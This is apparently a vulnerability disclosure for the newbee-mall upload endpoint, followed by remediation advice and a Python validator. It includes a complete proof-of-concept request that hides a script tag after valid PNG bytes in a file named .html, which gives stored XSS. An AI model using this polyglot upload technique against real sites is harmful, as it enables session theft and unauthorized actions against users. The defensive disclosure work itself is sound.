
PDF XSS Vulnerability in /upload/files of newbee-mall #99

@ez-lbz


Summary

In newbee-mall, the upload handler behind /upload/files accepts a file regardless of its extension or content, so an attacker who can reach the upload form can store active content (a PDF carrying JavaScript or, as in the proof of concept below, an HTML file) that the application later serves and a browser executes as stored cross-site scripting (XSS). The root cause is the same as in CVE-2025-4259, insufficient validation of uploaded file types, but that CVE covers the /upload/file route; this report covers the separate /upload/files route. Note that the request below is sent to /admin/upload/files with an authenticated admin session cookie, so the precondition is access to the admin panel.

Exploitation

Send the following crafted multipart request to the /upload/files endpoint (captured from Yakit; `{{unquote(...)}}` is Yakit's fuzz-tag syntax, which decodes the escaped string into the raw bytes of a 1x1 PNG before the request is sent). Note what the request relies on: the filename is white.html, the part's Content-Type is set by the attacker to image/png, and the body begins with a valid PNG so that a naive signature check would also pass, followed by the script tag that actually runs.

POST /admin/upload/files HTTP/1.1
Host: 127.0.0.1:28089
sec-ch-ua-platform: "Windows"
sec-ch-ua-mobile: ?0
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryVhv77D8bkWJbZjNQ
Origin: http://127.0.0.1:28089
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: iframe
Upgrade-Insecure-Requests: 1
Cookie: JSESSIONID=6C4975A8A36CAD2F1A5288233A2F4102
sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Mode: navigate
Referer: http://127.0.0.1:28089/admin/carousels
Content-Length: 404

------WebKitFormBoundaryVhv77D8bkWJbZjNQ
Content-Disposition: form-data; name="file"; filename="white.html"
Content-Type: image/png

{{unquote("\x89PNG\x0d\x0a\x1a\x0a\x00\x00\x00\x0dIHDR\x00\x00\x00\x01\x00\x00\x00\x01\x08\x02\x00\x00\x00\x90wS\xde\x00\x00\x00\x0cIDATx\x9cc\xf8\xff\xff?\x00\x05\xfe\x02\xfe\x0d\xefF\xb8\x00\x00\x00\x00IEND\xaeB`\x82")}}
<script>alert('test')</script>
------WebKitFormBoundaryVhv77D8bkWJbZjNQ--

Open the uploaded file in the browser. Because it is served under its .html name, the script appended after the PNG bytes executes.

Impact

  • Stored execution of attacker-controlled script whenever a user opens the uploaded file (PDF or HTML) in the browser

  • Theft of sensitive user data such as cookies or session tokens

  • Execution of unauthorized actions in the user’s context

Remediation

Enforce an extension allowlist (not a denylist) on the uploaded filename, verify that the file content matches the allowed type by its magic bytes rather than trusting the multipart Content-Type header (the proof of concept sets that header to image/png itself), and store the file under a server-generated name. When serving uploads, set Content-Type from the validated type and add X-Content-Type-Options: nosniff, ideally from a separate origin, so that anything that does slip through cannot run in the application's context.
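The following is an added example of such a check, not newbee-mall's own code (the project is Java; the logic is language-neutral and shown in Python so it runs stand-alone). The sample inputs are constructed inline: build_1x1_png() recreates the 1x1 white PNG that the report's payload begins with, and REPORT_PAYLOAD appends the same script tag. The check rejects that payload both under its original .html name and when renamed to .png (the PNG chunk walk refuses data after IEND), while accepting the clean image. ALLOWED_TYPES, MAX_UPLOAD_BYTES and the function names are this example's assumptions.

```python
"""Server-side validation for an image-upload endpoint (illustrative, not the project's code).

Every upload passes three checks: extension allowlist, magic-byte match, and
for PNG a full chunk walk that rejects anything appended after IEND. The
multipart Content-Type header is never consulted because the client sets it.
"""
import os
import struct
import uuid
import zlib

MAX_UPLOAD_BYTES = 5 * 1024 * 1024  # assumed limit for this example

# Extension -> (accepted leading bytes, MIME type used when serving the file back).
ALLOWED_TYPES = {
    ".png": ((b"\x89PNG\r\n\x1a\n",), "image/png"),
    ".jpg": ((b"\xff\xd8\xff",), "image/jpeg"),
    ".jpeg": ((b"\xff\xd8\xff",), "image/jpeg"),
    ".gif": ((b"GIF87a", b"GIF89a"), "image/gif"),
}


def png_is_clean(data: bytes) -> bool:
    """Walk the PNG chunk list; accept only if every chunk CRC matches and IEND is
    the last bytes of the file, so a polyglot with HTML/JS appended after the
    image (the report's payload) is rejected although it starts with a valid PNG."""
    pos = 8  # skip the signature, already checked by the caller
    while pos + 12 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        end = pos + 12 + length
        if end > len(data):
            return False  # chunk claims more bytes than the file has
        body = data[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", data[pos + 8 + length:end])
        if zlib.crc32(ctype + body) != crc:
            return False
        pos = end
        if ctype == b"IEND":
            return pos == len(data)  # anything after IEND -> reject
    return False  # ran out of data before IEND


def validate_upload(filename: str, data: bytes) -> tuple[bool, str]:
    """Return (accepted, mime_type_or_reason). Only the filename's extension and
    the bytes themselves are inspected; the client's Content-Type is ignored."""
    if not 0 < len(data) <= MAX_UPLOAD_BYTES:
        return False, "empty or oversized upload"
    ext = os.path.splitext(os.path.basename(filename))[1].lower()
    if ext not in ALLOWED_TYPES:
        return False, f"extension {ext or '(none)'} is not in the allowlist"
    magics, mime = ALLOWED_TYPES[ext]
    if not any(data.startswith(m) for m in magics):
        return False, f"content does not look like {mime}"
    if ext == ".png" and not png_is_clean(data):
        return False, "malformed PNG or data appended after IEND"
    return True, mime


def storage_name(ext: str) -> str:
    """Server-chosen filename: the client's name (and any path in it) is discarded."""
    return uuid.uuid4().hex + ext


def serving_headers(mime: str) -> dict:
    """Headers for serving a stored upload: fixed validated type, no sniffing."""
    return {
        "Content-Type": mime,
        "X-Content-Type-Options": "nosniff",
        "Content-Disposition": "inline",
    }


def build_1x1_png() -> bytes:
    """Constructed sample: a 1x1 white RGB PNG, the image the report's payload starts with."""
    def chunk(ctype: bytes, body: bytes) -> bytes:
        return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", zlib.crc32(ctype + body))
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)  # 1x1, 8-bit RGB, no interlace
    idat = zlib.compress(b"\x00\xff\xff\xff")  # filter byte 0 + one white pixel
    return b"\x89PNG\r\n\x1a\n" + chunk(b"IHDR", ihdr) + chunk(b"IDAT", idat) + chunk(b"IEND", b"")


# Constructed copy of the report's body: PNG bytes followed by the script tag.
REPORT_PAYLOAD = build_1x1_png() + b"\n<script>alert('test')</script>"

if __name__ == "__main__":
    cases = [
        ("white.html", REPORT_PAYLOAD),                # the report's request as sent
        ("white.png", REPORT_PAYLOAD),                 # same bytes renamed to pass an extension check
        ("white.png", build_1x1_png()),                # a genuine image
        ("evil.png", b"<script>alert(1)</script>"),    # right extension, wrong content
    ]
    for name, blob in cases:
        ok, info = validate_upload(name, blob)
        print(f"{name:10} {'ACCEPT' if ok else 'REJECT'}  {info}  -> {storage_name(os.path.splitext(name)[1]) if ok else ''}")
```

The extension check alone would have stopped the request as sent, but an attacker can simply rename the file, which is why the content walk matters: it is the only one of the three checks that rejects the renamed polyglot. Re-encoding accepted images through an image library is a stronger variant of the same idea.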
